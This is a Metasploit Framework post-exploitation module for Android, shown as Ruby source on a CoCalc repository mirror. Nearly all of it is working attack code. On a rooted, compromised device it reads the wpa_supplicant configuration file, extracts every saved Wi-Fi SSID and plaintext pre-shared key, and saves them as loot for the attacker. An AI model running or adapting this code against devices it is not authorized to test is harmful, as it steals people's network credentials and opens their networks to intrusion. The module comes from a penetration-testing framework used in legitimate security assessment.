CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/gather/wireless_ap.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::Common

9
  include Msf::Post::File

10
  include Msf::Post::Android::Priv

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        {

17
          'Name' => 'Displays wireless SSIDs and PSKs',

18
          'Description' => %q{

19
            This module displays all wireless AP creds saved on the target device.

20
          },

21
          'License' => MSF_LICENSE,

22
          'Author' => ['Auxilus', 'timwr'],

23
          'SessionTypes' => [ 'meterpreter', 'shell' ],

24
          'Platform' => 'android'

25
        }

26
      )

27
    )

28
  end

29


30
  def run

31
    unless is_root?

32
      print_error('This module requires root permissions.')

33
      return

34
    end

35


36
    data = read_file('/data/misc/wifi/wpa_supplicant.conf')

37
    aps = parse_wpa_supplicant(data)

38


39
    if aps.empty?

40
      print_error('No wireless APs found on the device')

41
      return

42
    end

43
    ap_tbl = Rex::Text::Table.new(

44
      'Header' => 'Wireless APs',

45
      'Indent' => 1,

46
      'Columns' => ['SSID', 'net_type', 'password']

47
    )

48


49
    aps.each do |ap|

50
      ap_tbl << [

51
        ap[0],  # SSID

52
        ap[1],  # TYPE

53
        ap[2]   # PASSWORD

54
      ]

55
    end

56


57
    print_line(ap_tbl.to_s)

58
    p = store_loot(

59
      'wireless.ap.creds',

60
      'text/csv',

61
      session,

62
      ap_tbl.to_csv,

63
      File.basename('wireless_ap_credentials.txt')

64
    )

65
    print_good("Secrets stored in: #{p}")

66
  end

67


68
  def parse_wpa_supplicant(data)

69
    aps = []

70
    networks = data.scan(/^network={$(.*?)^}$/m)

71
    networks.each do |block|

72
      aps << parse_network_block(block[0])

73
    end

74
    aps

75
  end

76


77
  def parse_network_block(block)

78
    ssid = parse_option(block, 'ssid')

79
    type = parse_option(block, 'key_mgmt', false)

80
    psk = parse_option(block, 'psk')

81
    [ssid, type, psk]

82
  end

83


84
  def parse_option(block, token, strip_quotes = true)

85
    if strip_quotes && ((result = block.match(/^\s#{token}="(.+)"$/)))

86
      return result.captures[0]

87
    elsif (result = block.match(/^\s#{token}=(.+)$/))

88
      return result.captures[0]

89
    end

90
  end

91


92
end

93


94